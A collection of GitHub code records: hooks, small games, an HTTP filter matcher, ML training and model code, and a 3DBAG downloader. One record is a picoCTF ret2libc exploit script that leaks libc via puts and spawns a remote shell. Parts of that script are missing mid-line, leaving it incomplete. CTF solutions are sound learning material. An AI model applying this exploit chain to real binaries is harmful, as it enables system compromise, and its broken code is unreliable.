item=task._item,\n data=self.parent.preprocess_data,\n fields=fields,\n upload_thumbnail=False,\n )\n\n self._sg_lookup_cache[shot_code] = sg_shot\n\n self.parent.log_info(\"_sg_lookup_cache: %s\" % (self._sg_lookup_cache))\n\n if sg_shot is None:\n raise RuntimeError(\"Could not find shot for custom resolver: %s\" % keyword)\n\n # strip off the leading and trailing curly brackets\n keyword = keyword[1:-1]\n result = sg_shot.get(keyword, \"\")\n\n self.parent.log_debug(\"Custom resolver: %s[%s] -> %s\" % (shot_code, keyword, result))\n\n return result","repo_name":"EntropyZeroStudio/Shotgun-Toolkit-Default-Config","sub_path":"hooks/tk-hiero-export/hiero_resolve_custom_strings.py","file_name":"hiero_resolve_custom_strings.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"16217768676","text":"import json\r\nimport os\r\nimport random\r\n\r\nclass RoleManager:\r\n def __init__(self, roles):\r\n self.roles = roles\r\n self.file_path = 'role.json'\r\n self.ensure_file_exists()\r\n\r\n def ensure_file_exists(self):\r\n if not os.path.exists(self.file_path):\r\n with open(self.file_path, \"w\") as f:\r\n json.dump({}, f)\r\n\r\n def read_role_data(self):\r\n with open(self.file_path, 'r') as f:\r\n return json.load(f)\r\n\r\n def write_role_data(self, data):\r\n with open(self.file_path, 'w') as f:\r\n json.dump(data, f)\r\n\r\n def get_role(self, user_id):\r\n role_data = self.read_role_data()\r\n return role_data.get(user_id, None)\r\n\r\n def set_role(self, user_id, role):\r\n role_data = self.read_role_data()\r\n role_data[user_id] = role\r\n self.write_role_data(role_data)\r\n\r\n def extract_random_role(self, user_id):\r\n user_role = self.get_role(user_id)\r\n if user_role is None:\r\n chosen_role = random.choice(self.roles)\r\n role = {\r\n \"name\": chosen_role,\r\n \"attack\": random.randint(10, 100),\r\n \"defense\": random.randint(10, 100),\r\n \"speed\": random.randint(10, 100)\r\n }\r\n self.set_role(user_id, role)\r\n return chosen_role\r\n else:\r\n return None\r\n","repo_name":"shixu915/shixu915.github.io","sub_path":"cute/role_manager.py","file_name":"role_manager.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8310045441","text":"#!/usr/bin/env python3\nimport tkinter as tk\nimport random\n\n\ndef calcular_ganador_piedra():\n eleccion_jugador = \"Piedra\"\n eleccion_cpu = random.randint(0, 2)\n\n if eleccion_jugador == \"Piedra\" and eleccion_cpu == 0:\n imagen_respuesta.configure(image=imagen_piedra)\n resultado = \"Empate\"\n\n elif eleccion_jugador == \"Piedra\" and eleccion_cpu == 1:\n imagen_respuesta.configure(image=imagen_papel)\n resultado = \"Derrota\"\n label_puntaje_cpu.configure(text=int(label_puntaje_cpu.cget(\"text\")) + 1)\n\n elif eleccion_jugador == \"Piedra\" and eleccion_cpu == 2:\n imagen_respuesta.configure(image=imagen_tijera)\n resultado = \"Victoria\"\n label_puntaje_jugador.configure(\n text=int(label_puntaje_jugador.cget(\"text\")) + 1\n )\n\n label_resultado.configure(text=resultado)\n\n\ndef calcular_ganador_papel():\n eleccion_jugador = \"Papel\"\n eleccion_cpu = random.randint(0, 2)\n\n if eleccion_jugador == \"Papel\" and eleccion_cpu == 0:\n imagen_respuesta.configure(image=imagen_piedra)\n resultado = \"Victoria\"\n label_puntaje_jugador.configure(\n text=int(label_puntaje_jugador.cget(\"text\")) + 1\n )\n\n elif eleccion_jugador == 
\"Papel\" and eleccion_cpu == 1:\n imagen_respuesta.configure(image=imagen_papel)\n resultado = \"Empate\"\n\n elif eleccion_jugador == \"Papel\" and eleccion_cpu == 2:\n imagen_respuesta.configure(image=imagen_tijera)\n resultado = \"Derrota\"\n label_puntaje_cpu.configure(text=int(label_puntaje_cpu.cget(\"text\")) + 1)\n label_resultado.configure(text=resultado)\n\n\ndef calcular_ganador_tijera():\n eleccion_jugador = \"Tijera\"\n eleccion_cpu = random.randint(0, 2)\n\n if eleccion_jugador == \"Tijera\" and eleccion_cpu == 0:\n imagen_respuesta.configure(image=imagen_piedra)\n resultado = \"Derrota\"\n label_puntaje_cpu.configure(text=int(label_puntaje_cpu.cget(\"text\")) + 1)\n\n elif eleccion_jugador == \"Tijera\" and eleccion_cpu == 1:\n imagen_respuesta.configure(image=imagen_papel)\n resultado = \"Victoria\"\n label_puntaje_jugador.configure(\n text=int(label_puntaje_jugador.cget(\"text\")) + 1\n )\n\n elif eleccion_jugador == \"Tijera\" and eleccion_cpu == 2:\n imagen_respuesta.configure(image=imagen_tijera)\n resultado = \"Empate\"\n\n label_resultado.configure(text=resultado)\n\n\nventana_principal = tk.Tk()\nventana_principal.geometry(\"500x800\")\nventana_principal.resizable(False, False)\nventana_principal.configure(\n background=\"#9BC4BC\", highlightbackground=\"black\", highlightthickness=8\n)\n\nlabel_titulo = tk.Label(\n text=\"Piedra, papel o tijera!\",\n background=\"#9BC4BC\",\n foreground=\"#090909\",\n font=(\"Verdana\", 20, \"bold\"),\n)\nlabel_titulo.place(x=90, y=20)\n\nlabel_puntaje_cpu = tk.Label(\n text=0, background=\"#9BC4BC\", foreground=\"#4B5043\", font=(\"Consolas\", 30, \"bold\")\n)\nlabel_puntaje_cpu.place(x=380, y=70)\n\nlabel_puntaje_jugador = tk.Label(\n text=0, background=\"#9BC4BC\", foreground=\"#4B5043\", font=(\"Consolas\", 30, \"bold\")\n)\nlabel_puntaje_jugador.place(x=120, y=70)\n\nimagen_piedra = tk.PhotoImage(file=\"piedra.png\")\nboton_piedra = tk.Button(\n ventana_principal,\n background=\"white\",\n image=imagen_piedra,\n borderwidth=5,\n relief=\"raised\",\n command=calcular_ganador_piedra,\n)\nboton_piedra.place(x=55, y=125)\n\nimagen_papel = tk.PhotoImage(file=\"papel.png\")\nboton_papel = tk.Button(\n ventana_principal,\n background=\"white\",\n image=imagen_papel,\n borderwidth=5,\n relief=\"raised\",\n command=calcular_ganador_papel,\n)\nboton_papel.place(x=55, y=310)\n\nimagen_tijera = tk.PhotoImage(file=\"tijera.png\")\nboton_tijera = tk.Button(\n ventana_principal,\n background=\"white\",\n image=imagen_tijera,\n borderwidth=5,\n relief=\"raised\",\n command=calcular_ganador_tijera,\n)\nboton_tijera.place(x=55, y=550)\n\nlabel_resultado = tk.Label(\n text=\"\", background=\"#9BC4BC\", foreground=\"#4B5043\", font=(\"Verdana\", 15, \"bold\")\n)\nlabel_resultado.place(x=220, y=75)\n\nimagen_respuesta = tk.Label(image=\"\", background=\"#9BC4BC\")\nimagen_respuesta.place(x=320, y=310)\n\nlabel_firma = tk.Label(\n text=\"[smc]\", background=\"#9BC4BC\", font=(\"monospace\", 20, \"bold\")\n)\nlabel_firma.place(x=400, y=740)\n\nventana_principal.mainloop()\n","repo_name":"sanmacorz/ejercicios-fundamentos","sub_path":"ejercicios-tkinter/ejercicio4.py","file_name":"ejercicio4.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"86480404708","text":"import os\n\nADD_TAG = 1\nSEE_TAG_LIST = 2\nGO_BACK = 3\n\ndef tagMenu():\n '''\n Tag menu where user is able to choose an option between add tag,\n see a tag or go back to main menu\n '''\n 
os.system('clear')\n\n print('\\nTAG MENU')\n\n print('\\n1 -> Add tag')\n print('2 -> See tag list')\n print('3 -> Go Back main menu')\n \n try:\n option = int(input('\\nChoose a number: '))\n except:\n os.system('clear')\n print('\\nNot a number!\\n')\n # to see this menu again\n return tagMenu()\n else:\n if option >= ADD_TAG or option <= GO_BACK:\n os.system('clear')\n # to see selected option\n return option\n else:\n os.system('clear')\n print('\\nNumber out range!\\n')\n # to see this menu again\n return tagMenu()\n","repo_name":"Sebas-Ar/Safe-password-v0.1","sub_path":"view/menu/tagMenu.py","file_name":"tagMenu.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1136593023","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom http_filter.http.parser import HTTPParser\nfrom http_filter.query.parser import QueryParser\n\n\nclass Matcher:\n def __init__(self, http_packet: HTTPParser, query: QueryParser):\n self.httpPacket = http_packet\n self.query = query\n\n def matches(self) -> bool:\n if self.query.ast:\n return self.match_tree(self.query.ast)\n return True\n\n def match_tree(self, root) -> bool:\n if \"o\" in root:\n if root[\"o\"] == \"not\":\n return not self.match_tree(root[\"child\"])\n elif root[\"o\"] == \"or\":\n return self.match_tree(root[\"left\"]) or self.match_tree(\n root[\"right\"])\n elif root[\"o\"] == \"and\":\n return self.match_tree(root[\"left\"]) and self.match_tree(\n root[\"right\"])\n else:\n key = root[\"k\"]\n val = root[\"v\"]\n operation = root[\"f\"]\n return self.match_packet(key, val, operation)\n\n def match_packet(self, key, val, function) -> bool:\n if not (key in self.httpPacket):\n return False\n if function == \"==\":\n if type(self.httpPacket[key.lower()]) is str:\n return self.httpPacket[key.lower()] == val\n else:\n return \"\".join(self.httpPacket[key.lower()]) == val\n if function == \"=~\":\n if type(self.httpPacket[key.lower()]) is str:\n return val in self.httpPacket[key.lower()]\n else:\n return val in \"\".join(self.httpPacket[key.lower()])\n","repo_name":"rzaluska/tkom","sub_path":"http_filter/query/matcher.py","file_name":"matcher.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43570323339","text":"#!/usr/bin/python3\n\nfrom pwn import *\nimport struct\n\n#init\nelf = ELF(\"./vuln\")\n\n'''\n$ ldd vuln\n linux-vdso.so.1 (0x00007ffcd37f7000)\n libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f76e16e7000)\n /lib64/ld-linux-x86-64.so.2 (0x00007f76e18c5000)\n'''\n\n#selection on local or remote\nLOCAL = False\n\nif(LOCAL):\n\tlibc = ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")\n\tp = elf.process()\nelse:\n\thost = 'mercury.picoctf.net'\n\tport = 23584\n\tlibc = ELF(\"./libc/libc.so.6\")\n\tp = remote(host, port)\n\n\n#find RIP offset with gdb-peda & python printing patterns\n#found 136 padding\npadding = b\"A\"*136\n\n#find 'pop rdi; ret' with ROPgadget to make sure puts() get the puts GOT param \n#puts will print out the puts GOT from the rdi\n'''\n─$ ROPgadget --binary ./vuln | grep \"pop rdi\" 2 ⨯\n0x0000000000400913 : pop rdi ; ret\n'''\nropGadget = struct.pack(\" 'puts' into puts to print puts GOT)\nputsPLT = elf.plt['puts'] #puts in plt (call puts())\ndo_stuffFunc = struct.pack(\" pop rdi; ret; + binsh_address\n\tp64(ret),\n\tp64(system_address),\t#16 bytes => ret; + 
system_address\n\tp64(ret),\n\tp64(exit_address)\t#16 bytes => ret; exit_address\n\t])\n\n#sending payload spawning shell\np.sendline(payload)\np.interactive()\n\n\n\n","repo_name":"nobodyatall648/picoGym-CTF","sub_path":"pwn BinaryExploitation/Here's a LIBC/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24293355810","text":"import os\nimport sys\nsys.path.append(os.getcwd().split('src')[0])\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport pickle\nimport os\nimport time\nimport argparse\nimport numpy as np\nfrom torch_geometric.data import DataLoader\n\nfrom src.model.gcn import GCN\nfrom src.data_util.rna_family_graph_dataset import RNAFamilyGraphDataset\nfrom src.util.visualization_util import plot_loss\nfrom src.data_util.data_constants import word_to_ix, families\nfrom src.evaluation.evaluation_util import evaluate_family_classifier, compute_metrics_family\n\ntorch.manual_seed(0)\nnp.random.seed(0)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--model_name', default=\"test\", help='model name')\nparser.add_argument('--device', default=\"cpu\", help='cpu or cuda')\nparser.add_argument('--n_samples', type=int, default=None, help='Number of samples to train on')\nparser.add_argument('--n_epochs', type=int, default=10000, help='Number of samples to train on')\nparser.add_argument('--embedding_dim', type=int, default=20, help='Dimension of nucleotide '\n 'embeddings')\nparser.add_argument('--hidden_dim', type=int, default=80, help='Dimension of hidden '\n 'representations of convolutional layers')\nparser.add_argument('--batch_size', type=int, default=64, help='Batch size')\nparser.add_argument('--learning_rate', type=float, default=0.0004, help='Learning rate')\nparser.add_argument('--seq_max_len', type=int, default=10000, help='Maximum length of sequences '\n 'used for training and testing')\nparser.add_argument('--seq_min_len', type=int, default=1, help='Maximum length of sequences '\n 'used for training and testing')\nparser.add_argument('--n_conv_layers', type=int, default=5, help='Number of convolutional layers')\nparser.add_argument('--conv_type', type=str, default=\"MPNN\", help='Type of convolutional layers')\nparser.add_argument('--dropout', type=float, default=0.1, help='Amount of dropout')\nparser.add_argument('--batch_norm', dest='batch_norm', action='store_true')\nparser.add_argument('--no_batch_norm', dest='batch_norm', action='store_false')\nparser.set_defaults(batch_norm=True)\nparser.add_argument('--residuals', type=bool, default=False, help='Whether to use residuals')\nparser.add_argument('--set2set_pooling', type=bool, default=True, help='Whether to use set2set '\n 'pooling')\nparser.add_argument('--early_stopping', type=int, default=30, help='Number of epochs for early '\n 'stopping')\nparser.add_argument('--verbose', type=bool, default=False, help='Verbosity')\nparser.add_argument('--foldings_dataset', type=str,\n default='../data/foldings.pkl', help='Path to foldings')\nparser.add_argument('--train_dataset', type=str,\n default='../data/train.fasta', help='Path to training '\n 'dataset')\nparser.add_argument('--val_dataset', type=str,\n default='../data/val.fasta', help='Path to val dataset')\n\n\nopt = parser.parse_args()\nprint(opt)\n\nn_classes = len(families)\nmodel = GCN(n_features=opt.embedding_dim, hidden_dim=opt.hidden_dim, n_classes=n_classes,\n n_conv_layers=opt.n_conv_layers,\n 
dropout=opt.dropout, batch_norm=opt.batch_norm, num_embeddings=len(word_to_ix),\n embedding_dim=opt.embedding_dim,\n node_classification=False, residuals=opt.residuals, device=opt.device,\n set2set_pooling=opt.set2set_pooling).to(opt.device)\n\nloss_function = nn.NLLLoss()\noptimizer = optim.Adam(model.parameters(), lr=opt.learning_rate)\n\n# Data Loading\nn_train_samples = None if not opt.n_samples else int(opt.n_samples * 0.8)\nn_val_samples = None if not opt.n_samples else int(opt.n_samples * 0.1)\n\ntrain_set = RNAFamilyGraphDataset(opt.train_dataset, opt.foldings_dataset,\n seq_max_len=opt.seq_max_len,\n seq_min_len=opt.seq_min_len,\n n_samples=n_train_samples)\nval_set = RNAFamilyGraphDataset(opt.val_dataset, opt.foldings_dataset, seq_max_len=opt.seq_max_len,\n seq_min_len=opt.seq_min_len,\n n_samples=n_val_samples)\n\ntrain_loader = DataLoader(train_set, batch_size=opt.batch_size, shuffle=True)\nval_loader = DataLoader(val_set, batch_size=opt.batch_size, shuffle=False)\n\ndef train_epoch(model, train_loader):\n model.train()\n losses = []\n accuracies = []\n\n for batch_idx, data in enumerate(train_loader):\n data.x = data.x.to(opt.device)\n data.edge_index = data.edge_index.to(opt.device)\n data.edge_attr = data.edge_attr.to(opt.device)\n data.batch = data.batch.to(opt.device)\n data.y = data.y.to(opt.device)\n\n model.zero_grad()\n\n out = model(data)\n\n # Loss is computed with respect to the target sequence\n loss = loss_function(out, data.y)\n losses.append(loss.item())\n loss.backward()\n optimizer.step()\n\n # Metrics are computed with respect to generated folding\n pred = out.max(1)[1]\n accuracy = compute_metrics_family(data.y, pred)\n accuracies.append(accuracy)\n\n avg_loss = np.mean(losses)\n avg_accuracy = np.mean(accuracies)\n\n print(\"training loss is {}\".format(avg_loss))\n print(\"accuracy: {}\".format(avg_accuracy))\n\n return avg_loss.item(), avg_accuracy\n\n\ndef run(model, n_epochs, train_loader, results_dir, model_dir):\n print(\"The model contains {} parameters\".format(sum(p.numel() for p in model.parameters() if p.requires_grad)))\n\n train_losses = []\n train_accuracies = []\n val_losses = []\n val_accuracies = []\n\n for epoch in range(n_epochs):\n start = time.time()\n print(\"Epoch {}: \".format(epoch + 1))\n\n loss, accuracy = train_epoch(model, train_loader)\n val_loss, val_accuracy = evaluate_family_classifier(model, val_loader,\n loss_function, mode='val',\n device=opt.device, verbose=opt.verbose)\n end = time.time()\n print(\"Epoch took {0:.2f} seconds\".format(end - start))\n\n if not val_accuracies or val_accuracy > max(val_accuracies):\n torch.save(model.state_dict(), model_dir + 'model.pt')\n print(\"Saved updated model\")\n #\n train_losses.append(loss)\n val_losses.append(val_loss)\n train_accuracies.append(accuracy)\n val_accuracies.append(val_accuracy)\n\n plot_loss(train_losses, val_losses,file_name=results_dir + 'loss.jpg')\n plot_loss(train_accuracies, val_accuracies, file_name=results_dir + 'acc.jpg',\n y_label='accuracy')\n\n pickle.dump({\n 'train_losses': train_losses,\n 'val_losses': val_losses,\n 'train_accuracies': train_accuracies,\n 'val_accuracies': val_accuracies,\n }, open(results_dir + 'scores.pkl', 'wb'))\n\n if len(val_accuracies) > opt.early_stopping and max(val_accuracies[-opt.early_stopping:])\\\n < max(val_accuracies):\n print(\"Training terminated because of early stopping\")\n print(\"Best val_loss: {}\".format(min(val_losses)))\n print(\"Best val_accuracy: {}\".format(max(val_accuracies)))\n\n with open(results_dir 
+ 'scores.txt', 'w') as f:\n f.write(\"Best val_accuracy: {}\".format(max(\n val_accuracies)))\n break\n\n\ndef main():\n results_dir = '../results_family_classification/{}/'.format(opt.model_name)\n model_dir = '../models_family_classification/{}/'.format(opt.model_name)\n os.makedirs(results_dir, exist_ok=True)\n os.makedirs(model_dir, exist_ok=True)\n\n with open(results_dir + 'hyperparams.txt', 'w') as f:\n f.write(str(opt))\n\n with open(results_dir + 'hyperparams.pkl', 'wb') as f:\n pickle.dump(opt, f)\n\n run(model, opt.n_epochs, train_loader, results_dir, model_dir)\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"emalgorithm/ncRNA-family-prediction","sub_path":"src/training/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":8430,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"9589404151","text":"from gpt import GPT\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom functools import partial\n\nfrom modeling_vqvae import _cfg\nfrom timm.models.registry import register_model\nfrom timm.models.layers import trunc_normal_ as __call_trunc_normal_\n\nfrom einops import rearrange\n\n\ndef trunc_normal_(tensor, mean=0., std=1.):\n __call_trunc_normal_(tensor, mean=mean, std=std, a=-std, b=std)\n\nclass ClassEncoder(nn.Module):\n \"\"\"Container module with an encoder, a recurrent or transformer module, and a decoder.\"\"\"\n\n def __init__(self, ninp, nhead, nlayers, nclasses=55, coord_vocab_size=256, latent_vocab_size=512, reso=128):\n super(ClassEncoder, self).__init__()\n self.reso = reso\n\n self.pos_emb = nn.Parameter(nn.Embedding(reso, ninp).weight[None]) \n\n self.x_tok_emb = nn.Embedding(coord_vocab_size, ninp)\n self.y_tok_emb = nn.Embedding(coord_vocab_size, ninp)\n self.z_tok_emb = nn.Embedding(coord_vocab_size, ninp)\n\n self.latent_tok_emb = nn.Embedding(latent_vocab_size, ninp)\n\n self.coord_vocab_size = coord_vocab_size\n\n self.latent_vocab_size = latent_vocab_size\n\n self.class_enc = nn.Embedding(nclasses, ninp)\n\n self.transformer = GPT(vocab_size=512, block_size=self.reso, n_layer=nlayers, n_head=nhead, n_embd=ninp, embd_pdrop=0.1, resid_pdrop=0.1, attn_pdrop=0.1)\n\n self.ln_x = nn.LayerNorm(ninp)\n self.x_head = nn.Linear(ninp, coord_vocab_size, bias=False)\n\n self.ln_y = nn.LayerNorm(ninp)\n self.y_head = nn.Linear(ninp, coord_vocab_size, bias=False)\n\n self.ln_z = nn.LayerNorm(ninp)\n self.z_head = nn.Linear(ninp, coord_vocab_size, bias=False)\n\n self.ln_latent = nn.LayerNorm(ninp)\n self.latent_head = nn.Linear(ninp, latent_vocab_size, bias=False)\n\n\n def forward(self, coordinates, latents, classes):\n features = self.class_enc(classes)[:, None] # B x 1 x C\n\n position_embeddings = self.pos_emb # 1 x S x C\n\n x_token_embeddings = self.x_tok_emb(coordinates[:, :, 0]) # B x S x C\n y_token_embeddings = self.y_tok_emb(coordinates[:, :, 1]) # B x S x C\n z_token_embeddings = self.z_tok_emb(coordinates[:, :, 2]) # B x S x C\n latent_token_embeddings = self.latent_tok_emb(latents) # B x S x C\n\n token_embeddings = torch.cat([features, latent_token_embeddings + x_token_embeddings + y_token_embeddings + z_token_embeddings], dim=1) # B x (1+S) x C\n embeddings = token_embeddings[:, :-1] + position_embeddings # B x S x C\n\n x = self.transformer.drop(embeddings)\n\n for block in self.transformer.blocks[:12]:\n x = block(x) # B x S x C\n x_logits = F.log_softmax(self.x_head(self.ln_x(x)), dim=-1).permute(0, 2, 
1).view(coordinates.shape[0], self.coord_vocab_size, self.reso)\n x = x + x_token_embeddings + position_embeddings\n\n for block in self.transformer.blocks[12:16]:\n x = block(x)\n y_logits = F.log_softmax(self.y_head(self.ln_y(x)), dim=-1).permute(0, 2, 1).view(coordinates.shape[0], self.coord_vocab_size, self.reso)\n x = x + x_token_embeddings + y_token_embeddings + position_embeddings\n\n for block in self.transformer.blocks[16:20]:\n x = block(x)\n z_logits = F.log_softmax(self.z_head(self.ln_z(x)), dim=-1).permute(0, 2, 1).view(coordinates.shape[0], self.coord_vocab_size, self.reso)\n x = x + x_token_embeddings + y_token_embeddings + z_token_embeddings + position_embeddings\n\n for block in self.transformer.blocks[20:]:\n x = block(x)\n latent_logits = F.log_softmax(self.latent_head(self.ln_latent(x)), dim=-1).permute(0, 2, 1).view(coordinates.shape[0], self.latent_vocab_size, self.reso)\n\n return x_logits, y_logits, z_logits, latent_logits\n\n @torch.no_grad()\n def sample(self, cond):\n cond = cond[:, None]\n\n position_embeddings = self.pos_emb\n\n coord1, coord2, coord3, latent = None, None, None, None\n for i in range(self.reso):\n if coord1 is None:\n x = self.transformer.drop(cond + position_embeddings[:, :1, :])\n for block in self.transformer.blocks[:12]:\n x = block(x) # B x S x C\n coord1_logits = self.x_head(self.ln_x(x))\n ix = sample(coord1_logits)\n coord1 = ix\n x_token_embeddings = self.x_tok_emb(coord1)\n\n x = x + x_token_embeddings + position_embeddings[:, :1, :]\n for block in self.transformer.blocks[12:16]:\n x = block(x) # B x S x C\n coord2_logits = self.y_head(self.ln_y(x))\n ix = sample(coord2_logits)\n coord2 = ix\n y_token_embeddings = self.y_tok_emb(coord2)\n\n x = x + x_token_embeddings + y_token_embeddings + position_embeddings[:, :1, :]\n for block in self.transformer.blocks[16:20]:\n x = block(x) # B x S x C\n coord3_logits = self.z_head(self.ln_z(x))\n ix = sample(coord3_logits)\n coord3 = ix\n z_token_embeddings = self.z_tok_emb(coord3)\n\n x = x + x_token_embeddings + y_token_embeddings + z_token_embeddings + position_embeddings[:, :1, :]\n for block in self.transformer.blocks[20:]:\n x = block(x) # B x S x C\n latent_logits = self.latent_head(self.ln_latent(x))\n ix = sample(latent_logits)\n latent = ix\n\n else:\n x_token_embeddings = self.x_tok_emb(coord1) # B x S x C\n y_token_embeddings = self.y_tok_emb(coord2) # B x S x C\n z_token_embeddings = self.z_tok_emb(coord3) # B x S x C\n latent_token_embeddings = self.latent_tok_emb(latent) # B x S x C\n\n token_embeddings = torch.cat([cond, latent_token_embeddings + x_token_embeddings + y_token_embeddings + z_token_embeddings], dim=1) # B x (1+S) x C\n embeddings = token_embeddings + position_embeddings[:, :token_embeddings.shape[1], :] # B x S x C\n # print(embeddings.shape)\n\n x = self.transformer.drop(embeddings)\n for block in self.transformer.blocks[:12]:\n x = block(x) # B x S x C\n coord1_logits = self.x_head(self.ln_x(x))\n ix = sample(coord1_logits)\n coord1 = torch.cat((coord1, ix), dim=1)\n x_token_embeddings = self.x_tok_emb(coord1)\n\n x = x + x_token_embeddings + position_embeddings[:, :x.shape[1], :]\n for block in self.transformer.blocks[12:16]:\n x = block(x) # B x S x C\n coord2_logits = self.y_head(self.ln_y(x))\n ix = sample(coord2_logits)\n coord2 = torch.cat((coord2, ix), dim=1)\n y_token_embeddings = self.y_tok_emb(coord2)\n\n x = x + x_token_embeddings + y_token_embeddings + position_embeddings[:, :x.shape[1], :]\n for block in self.transformer.blocks[16:20]:\n x = block(x) 
# B x S x C\n coord3_logits = self.z_head(self.ln_z(x))\n ix = sample(coord3_logits)\n coord3 = torch.cat((coord3, ix), dim=1)\n z_token_embeddings = self.z_tok_emb(coord3)\n\n x = x + x_token_embeddings + y_token_embeddings + z_token_embeddings + position_embeddings[:, :x.shape[1], :]\n for block in self.transformer.blocks[20:]:\n x = block(x) # B x S x C\n latent_logits = self.latent_head(self.ln_latent(x))\n ix = sample(latent_logits)\n latent = torch.cat((latent, ix), dim=1)\n return coord1, coord2, coord3, latent\n\n @torch.jit.ignore\n def no_weight_decay(self):\n return {'pos_emb', 'xyz_emb'}\n\n\ndef sample(logits, top_k=100, top_p=0.85):\n temperature = 1.0\n logits = logits[:, -1, :] / temperature\n probs = F.softmax(logits, dim=-1)\n\n\n top_k = top_k\n topk, indices = torch.topk(probs, k=top_k, dim=-1)\n probs = torch.zeros(*probs.shape).to(probs.device).scatter_(1, indices, topk)\n\n # top-p\n top_p = top_p\n sorted_probs, sorted_indices = torch.sort(probs, descending=True)\n cumulative_probs = torch.cumsum(sorted_probs, dim=-1)\n\n sorted_indices_to_remove = cumulative_probs > top_p\n\n sorted_indices_to_remove[..., 1:] = sorted_indices_to_remove[..., :-1].clone()\n sorted_indices_to_remove[..., 0] = False\n\n indices_to_remove = sorted_indices_to_remove.scatter(1, sorted_indices, sorted_indices_to_remove)\n probs[indices_to_remove] = 0\n\n ix = torch.multinomial(probs, num_samples=1)\n return ix\n\n@register_model\ndef class_encoder_55_512_1024_24_K1024(pretrained=False, **kwargs):\n model = ClassEncoder(\n ninp=1024,\n nhead=16,\n nlayers=24,\n nclasses=55,\n coord_vocab_size=256, \n latent_vocab_size=1024,\n reso=512,\n )\n model.default_cfg = _cfg()\n return model\n","repo_name":"1zb/3DILG","sub_path":"modeling_prob.py","file_name":"modeling_prob.py","file_ext":"py","file_size_in_byte":9136,"program_lang":"python","lang":"en","doc_type":"code","stars":80,"dataset":"github-code","pt":"32"} +{"seq_id":"31380327588","text":"import json\nimport urllib\nimport gzip\nimport argparse\nfrom pathlib import Path\nimport subprocess\nimport multiprocessing\nimport logging\nimport sys\n\nfrom cjio import cityjson\nfrom owslib.wfs import WebFeatureService\n\nCITYJSON_URL = \"https://data.3dbag.nl/cityjson/v210908_fd2cee53/3dbag_v210908_fd2cee53_{TID}.json.gz\"\n\ndef bbox_from_poi(poi, radius):\n x, y = poi\n return [ x-radius, y-radius, x+radius, y+radius ]\n\ndef get_tile_ids(bbox):\n wfs11 = WebFeatureService(url='https://data.3dbag.nl/api/BAG3D_v2/wfs', version='1.1.0')\n response = wfs11.getfeature(typename='BAG3D_v2:bag_tiles_3k', bbox=bbox, srsname='urn:x-ogc:def:crs:EPSG:28992', outputFormat='json')\n\n tiles = json.loads( response.read().decode('utf-8') )['features']\n tile_ids = [ tile['properties']['tile_id'] for tile in tiles ]\n\n return tile_ids\n\ndef download_3dbag(tile_ids, tilesdir):\n fnames = []\n for tid in tile_ids:\n url = CITYJSON_URL.format(TID=tid)\n logging.info(url)\n fname = tilesdir / (tid+'.json')\n try:\n with urllib.request.urlopen(url) as response, open(fname, 'wb') as out_file:\n data = response.read() # a `bytes` object\n out_file.write( gzip.decompress(data) )\n fnames.append(fname)\n except urllib.error.HTTPError as err:\n logging.warning(err)\n \n return fnames\n\ndef prepf(file):\n def set_base_zero(cm):\n def collect_vertex_ids(v_correct, h_base, boundaries):\n if type(boundaries[0]) == list:\n for bb in boundaries:\n collect_vertex_ids(v_correct, h_base, bb)\n else:\n for v in boundaries:\n v_correct[v] = h_base\n \n v_correct = {}\n for 
building in cm.get_cityobjects(type='Building').values():\n h_base = int( building.attributes['h_maaiveld'] / cm.j['transform']['scale'][2] )\n for partid in building.children:\n part = cm.j['CityObjects'][partid]\n for geom in part['geometry']:\n collect_vertex_ids(v_correct, h_base, geom['boundaries'])\n for v, hb in v_correct.items():\n cm.j['vertices'][v][2] -= hb\n\n cm = cityjson.load(file)\n cm.extract_lod('2.2')\n set_base_zero(cm)\n return cm\n\ndef prep_for_blender(files, fout='x.obj', origin_offset = (0,0)):\n pool_obj = multiprocessing.Pool()\n\n logging.info('prepping cm\\'s...')\n cms = pool_obj.map(prepf,files)\n # logging.info(answer)\n \n logging.info('merging cm\\'s...')\n cms[0].merge(cms[1:])\n cm = cms[0]\n\n logging.info('shifting origin...')\n # move to origin, notice that the transform object is gone after merging and the vertices are floats with the full coordinates\n for v in cm.j['vertices']:\n v[0] -= origin_offset[0]\n v[1] -= origin_offset[1]\n\n logging.info('writing obj...')\n with open(fout, mode='w') as fo:\n re = cm.export2obj()\n fo.write(re.getvalue())\n\nif __name__ == '__main__':\n # poi = (207515.1,474217.3)\n # radius = 1000\n # city_name = 'deventer'\n parser = argparse.ArgumentParser()\n parser.add_argument(\"poi\", help=\"point of interest in RD coordinates\", nargs=2, type=float)\n parser.add_argument(\"radius\", help=\"radius of bounding box around poi\", type=float, default=1000)\n parser.add_argument(\"pathname\", help=\"name of output dir\", type=str)\n args = parser.parse_args()\n\n # setup logger\n root = logging.getLogger()\n root.setLevel(logging.INFO)\n\n handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(logging.INFO)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n root.addHandler(handler)\n\n logging.info('getting tile ids...')\n tids = get_tile_ids( bbox_from_poi(args.poi, args.radius) )\n \n 